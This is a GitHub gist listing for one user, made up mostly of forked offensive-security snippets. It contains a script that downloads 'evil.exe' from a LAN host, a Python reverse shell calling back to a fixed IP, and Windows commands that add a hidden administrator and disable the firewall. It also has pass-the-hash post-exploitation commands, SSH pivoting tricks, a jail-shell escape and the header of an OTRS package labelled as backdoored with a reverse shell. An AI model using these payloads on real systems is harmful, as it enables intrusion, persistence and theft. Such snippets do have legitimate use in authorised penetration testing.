Robert Mckay buglessdr

  • Edgile
  • Mesa, Arizona
@buglessdr
buglessdr / wget_vbs
Created July 19, 2017 02:25 — forked from sckalath/wget_vbs
wget vbscript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
buglessdr / tricks
Created July 19, 2017 02:25 — forked from sckalath/tricks
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
buglessdr / windows_crap
Created July 19, 2017 02:26 — forked from sckalath/windows_crap
windows crap
#add a user
net user ryan mwcb /add
#add user to local administrators
net localgroup administrators /add ryan
#remove firewall
netsh firewall set opmode disable
#enable remote desktop
buglessdr / ssh_tricks
Created July 19, 2017 02:26 — forked from waywardsun/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
buglessdr / simple_py_shell
Created July 19, 2017 02:27 — forked from sckalath/simple_py_shell
Simple Python Shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.10.52:8000/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
buglessdr / simple_py_line_splitter
Created July 19, 2017 18:58
Python Line Splitter to limit lines to 80 chars
#!/usr/bin/python
import sys
def split_by_length(s,block_size):
w=[]
n=len(s)
for i in range(0,n,block_size):
w.append(s[i:i+block_size])
if w[-1].isspace():
buglessdr / simple_icacls_file_permission.bat
Created July 19, 2017 21:24
Script that queries all services and searches for executables that give the Everyone group RW access.
@echo off
REM Description: Script that queries all services and searches for executables that give the Everyone group RW access.
REM Type: Incorrect file permissions
REM Note: The ^ character escapes certain characters that would otherwise break the FOR loop.
REM Note: tokens=1* - The value before the first delimiter and everything after it.
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
icacls "%%~x"
)
buglessdr / windows-post-exploitation.sh
Created July 28, 2017 00:25 — forked from 1N3/windows-post-exploitation.sh
A Windows post exploitation shell script
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
buglessdr / MyPackage.opm
Created September 1, 2017 06:14 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>